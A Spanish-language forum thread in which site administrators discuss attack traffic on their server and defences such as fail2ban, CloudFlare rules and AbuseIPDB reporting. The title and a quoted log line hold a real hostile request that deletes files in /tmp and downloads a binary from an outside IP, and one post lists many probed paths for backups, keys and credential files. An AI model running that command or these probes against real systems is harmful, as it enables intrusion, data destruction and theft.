GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86

Iniciado por el-brujo, 19 Diciembre 2020, 12:43 PM

0 Miembros y 2 Visitantes están viendo este tema.

Danielㅤ

Bien brujo, me alegro que estés mejorando la seguridad del foro ;-)


Saludos
¡Regresando como cual Fenix! ~
Bomber Code © 2021 https://www.bombercode.net/foro/

Ayudas - Aportes - Tutoriales - Y mucho mas!!!

Xyzed

Qué locura, así es en varios proovedores, ni bien levantas un servidor automáticamente te llegan solicitudes raras.
@[D]aniel, a lo que te referís es una especie de honeypot  :rolleyes:
...

Danielㅤ

#12
Hay administradores que publican esas IPs maliciosas en PasteBin, ya sea el log del ataque o simplemente las IPs solas y como ya sabrán de la misma forma que uno tiene una IP pública y hay gente que molesta, de la misma forma los van a molestar a ellos.

Otra forma es cargar esas IPs en páginas como StopForumSpam.

Yo alguna vez he creado un script en Python que lee el archivo log de accesos cada x tiempo y si detecta x cantidad de solicitudes en x tiempo, las agrega al archivo .htaccess con deny from IP, también se puede comprobar esas IPs con algunas blacklist haciendo un dns, cuando esos atacantes se dan cuenta que hay un sistema automático que las bloquea por intentos de login o por acciones maliciosas, dejan de molestar, además que no pueden porque IP que prueban va derecho a ser bloqueada.

También es posible usar la API de SFP (pero ésta es limitada)

https://www.stopforumspam.com/usage


Saludos
¡Regresando como cual Fenix! ~
Bomber Code © 2021 https://www.bombercode.net/foro/

Ayudas - Aportes - Tutoriales - Y mucho mas!!!

Xyzed

Cita de: [D]aniel en  7 Enero 2021, 13:54 PM
Hay administradores que publican esas IPs maliciosas en PasteBin, ya sea el log del ataque o simplemente las IPs solas y como ya sabrán de la misma forma que uno tiene una IP pública y hay gente que molesta, de la misma forma los van a molestar a ellos.

Otra forma es cargar esas IPs en páginas como StopForumSpam.

Yo alguna vez he creado un script en Python que lee el archivo log de accesos cada x tiempo y si detecta x cantidad de solicitudes en x tiempo, las agrega al archivo .htaccess con deny from IP, también se puede comprobar esas IPs con algunas blacklist haciendo un dns, cuando esos atacantes se dan cuenta que hay un sistema automático que las bloquea por intentos de login o por acciones maliciosas, dejan de molestar, además que no pueden porque IP que prueban va derecho a ser bloqueada.

También es posible usar la API de SFP (pero ésta es limitada)

https://www.stopforumspam.com/usage


Saludos
Muy interesante, gracias por la información.
...

Danielㅤ

#14
CitarGET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86

Cuándo yo tenía mi foro tenía solicitudes como esas y lo que hacía algunas veces era entrar a esas URL pero desde un script en python nunca del navegador (excepto si usaba view-source:URL) y hasta usaba un proxy anónimo o después cambiaba la IP, cuando entraba en esa dirección guardaba la salida de la descarga en un archivo txt y lo analizaba, algunas veces encontraba código javascript con una redirección a otra URL o a otra IP, pero quería ver el destino, que es lo que realmente quería el atacante que descargue el servidor, y eran script en bash, perl o python, incluso hasta algunos eran en javascript, supongo que javascript para inyectar código malicioso en archivos PHP.

La verdad es interesante ver a dónde van y que contiene lo que te quieren hacer descargar, se puede aprender de esos códigos porque muchos son códigos privados que solo los atacantes los crean, no están publicados, se puede aprender la forma que utilizan para infectar, para no ser detectados, te hacen descargar cosas, instalarlas o llevarte datos de tu servidor al suyo y después borrar todo, por ejemplo borrar los logs, ademas he llegado a ver hasta códigos en reverso y después lo invertian y los ejecutaban, incluso hasta usaban varios lenguajes, por ejemplo te querían descargar en el servidor un archivo bash pero este a su vez descargaba uno en Python y desde Python ejecutaban otro en Perl.

También en esos códigos se podía ver cómo hacían todas las instrucciones y después borraban todo automáticamente para no dejar rastros, pero las formas y métodos que usaban eran interesante, lo mismo con los códigos que los programaban para que hagan tal cosa y realmente hasta sorprendía la forma que utilizaban de lograr lo que querían, todo eso lo analizaba y aprendía.

Otras veces cuando miraba el log de accesos veía como inventaban el URL Referer, ponían páginas o direcciones de IP con datos para que me interese y acceda, como si fuera que en tal dominios o IPs habían datos de mi foro o algo por el estilo, y analizaba esas direcciones desde modo raw mostrando por consola lo que había en el destino o guardaba la salida en un txt y lo miraba, y casi siempre eran puros virus para que los descargue desde el navegador apenas entre a esa dirección, de todas maneras yo usaba Firefox última versión, tenía todas las actualizaciones de Windows, tenía de firewall Comodo, además de Malwarebytes analizando todo el tiempo y también el Malwarebytes anti-rootkit, etc.

Otras veces pasaba que en el foro aparecían como bots de Google, usaban el user-agent de los bots spiders y recorrían el foro, esto lo hacían para ver si podían ver algo que los visitantes o usuarios no podían ver y realmente veían lo mismo, pero lo hacían para eso o para ver si podían tener algún acceso a algún lado.

Llegué a ver también que en los archivos por ejemplo de Python usaban números chars (por ejemplo chr(99)) y estos los unian para formar comandos y así ejecutarlos.


Saludos
¡Regresando como cual Fenix! ~
Bomber Code © 2021 https://www.bombercode.net/foro/

Ayudas - Aportes - Tutoriales - Y mucho mas!!!

el-brujo

#15
Quizás sea una buena idea reportar automáticamente las ip's a alguna servicio de terceros. He visto que hay varios servicios (un montón), cuando buscas por Google por una IP maliciosa ya aparecen los reportes y demás.

Los intentos fallidos de fail2ban por ssh son alarmantes xD



CitarOtras veces pasaba que en el foro aparecían como bots de Google, usaban el user-agent de los bots spiders y recorrían el foro, esto lo hacían para ver si podían ver algo que los visitantes o usuarios no podían ver y realmente veían lo mismo, pero lo hacían para eso o para ver si podían tener algún acceso a algún lado.

Hay una regla en CloudFlare para bloquear los bots falsos, ip's que no pertenecen al rango de bots de Google y la tenemos activada

Acabaré haciendo el log del mod_security público y en tiempo real. Ví que habia un panel de control para mod_security pero sólo para Plesk.

El WAF de CloudFLare no para de trabajar, pero ni en versión de pago se pueden bajar o descargar los logs de registro, lo cuál es una pena.

Danielㅤ

#16
Si es buena idea reportar esas IPs maliciosas, de hecho esta misma petición ya aparece en Google, ya lo han reportado en varios sitios:

https://www.google.com.ar/search?&q=Re%3A+GET+%2Fshell%3Fcd%2B%2Ftmp%3Brm%2B-rf%2B*%3Bwget%2B185.172.111.214%2Fbins%2FUnHAnaAW.x86

En mí servidor VPS no disponía de CloudFlare.

Eso estamos esperando el reporte completo del log del mod_security ;)


Saludos
¡Regresando como cual Fenix! ~
Bomber Code © 2021 https://www.bombercode.net/foro/

Ayudas - Aportes - Tutoriales - Y mucho mas!!!

el-brujo

Muy divertido también ver todas las peticiones no encontradas.

La mayoría en busca de scripts de wordpress y copias de seguridad:

Errores 404

/config.bak.php
/admin.php
/admin/index.php
/phpMyAdmin/
/app/etc/local.xml
/phpmyadmin/
/shell.php
/wp-content/uploads/
/admin/logs/errors.log
/backup.sql
/database.sql
/db.sql
/m.php
/localhost.sql
/mysql.sql
/.ksh_history
/.zsh_history
/dbdump.sql
/.env.development.local
elhacker.net.sq
/backup.sql.gz
/server.key
/key.pem
/www.key
/elhacker.net.sql.gz
/mysqldump.sql
/wp-content/uploads/upload_index.php
/wp-content/backup-db/
/www.elhacker.net.sql.gz
/phpinfo.php
/elhacker.net.tar.gz
/my.key 2 -
/site.sql 2 -
/elmah.axd 2 -
/www.tar.gz
/backup.rar
/www.elhacker.net.tar.gz
/privatekey.key
/db_backup.sql
/.env.prod.local 2 -
/.env.production.local 2 -
/temp.sql 2 -
/www.elhacker.net.gz 2 -
/translate.sql 2 -
/api/api-browser/ 2 -
/wp-content/uploads/dump.sql 2 -
/www.elhacker.net.7z
/back/bak.zip
/_DB_.tar.gz
/old/bak.tar.gz
/backup-localhost.sql.gz
/www.elhacker.net.db
/backup/bak.tar.gz
/bak/www.sql 1 -
/restore/directory.tar.gz 1 -
/bak/directory.zip 1 -
/restore/elhacker.net.gz 1 -
/wp-content/plugins/three-column-screen-layout/db.php 1 -
/elhacker.tar.gz
/localhost-dump.sql.gz 1 -
/inc/database.php.bck 1 -
/elhackerdb.sql 1 -
/elhacker.net.xz 1 -
/_DB_.sql.zip
/dump.rar 1 -
/back/backup.gz
/www.elhacker.net.pem 1 -
/old/website.rar 1 -
/elhacker.net.sql.tar.gz 1 -
/wordpress/wp-config.php~ 1 -
/webadmin.php 1 -
/backup/backup.tar.gz 1 -
/old/www.tar.gz
/backups/elhacker.net.gz 1 -
/wp-content/plugins/wp-1ogin_bak.php 1 -
/elhacker.net.sql.tar.z
/restore/backup.tar.gz 1 -
/backup.tgz 1 -
/restore/.well-known.zip 1 -
/js/mage/adminhtml/sales.js 1 -
/elhacker.bck.sql
/www.elhacker.net.tar 1 -
/old/backup.gz 1 -
/elhacker.gz
/inc/config.php.bck 1 -
/backup/elhacker.net.zip 1 -
/backup/www.zip 1 -
/localhost_database.sql.gz
elhacker.net.bak.sql 1 -
/back/backup.tar.gz 1 -
/restore/directory.gz 1 -
/backupelhacker.net.sql 1 -
/localhost-db.sql.gz 1 -
/backups/www.gz 1 -
/elhacker_backup.gz
/backup.ibz 1 -
/www.elhacker.tar 1 -
/bak.rar 1 -
/db_backup.elhacker.sql.gz 1 -
/localhostbackup.sql.gz
//backup/wp-admin/install.php 1 -
/administrator/index.php 1 -
/backups/backup.tar.gz 1 -
/restore/website.tar.gz
/back/credentials.txt 1 -
/backupelhacker.net.sql.gz 1 -
/back/www.gz 1 -
/bak/sql.sql
/bak/website.tar.gz 1 -
/bak/www.gz
/site.tgz 1 -
/backups/elhacker.net.tar.gz 1 -
/localhost_db.sql.gz 1 -
/public_html.tar
/elhacker.net.z 1 -
/localhost_dump.sql 1 -
/conf/database.bck 1 -
/site.rar 1 -
/elhacker.net.sql.zip
/backups/www.rar
/htodcs.rar 1 -
/elhacker.sql 1 -
/elhacker.net_database.sql
/backup/backup.bz2 1 -
/elhacker_backup.tgz 1 -
/restore/elhacker.net.rar
/web.rar 1 -
/home.tar 1 -
/back/elhacker.net.zip
/elhacker.net.bck 1 -
/bak/elhacker.net.sql
www.elhacker.net.sql.bz2 1 -
/backup.backup
/db.php.bck 1 -
/elhacker.net-backup.sql.gz 1 -
/elhacker.bck
/back/sql.sql 1 -
/conf/config.php.bck
elhacker.net_dump.sql 1 -
/elhacker_db.sql 1 -
/elhacker.net_db.sql 1 -
/backups/bak.zip 1 -
/conf.gz
[..]

Danielㅤ

#18
jajaja pues si, hay solicitudes hasta de quererse descargar el sitio entero:


elhacker.net.tar.gz
backup.rar
www.elhacker.net.tar.gz
www.elhacker.net.gz
www.elhacker.net.7z
elhacker.tar.gz
[...]


aunque también hay de quererse descargar bases de datos y hasta credenciales de acceso.


Saludos
¡Regresando como cual Fenix! ~
Bomber Code © 2021 https://www.bombercode.net/foro/

Ayudas - Aportes - Tutoriales - Y mucho mas!!!

el-brujo

Finalmente voy a usar AbuseIPDB  para reportar las IP's de ataques hacking mod_security y brute-force login ssh y ftp vía fail2ban



Ya tengo la API creada y empezaré a reportar en breve. El límite son 3.000 ip's diarias xD

Integrating AbuseIPDB with Fail2Ban - Automatically Report Bad IPs
https://www.abuseipdb.com/fail2ban.html

Instalar y configurar Fail2ban
https://blog.elhacker.net/2014/05/instalar-y-configurar-fail2ban.html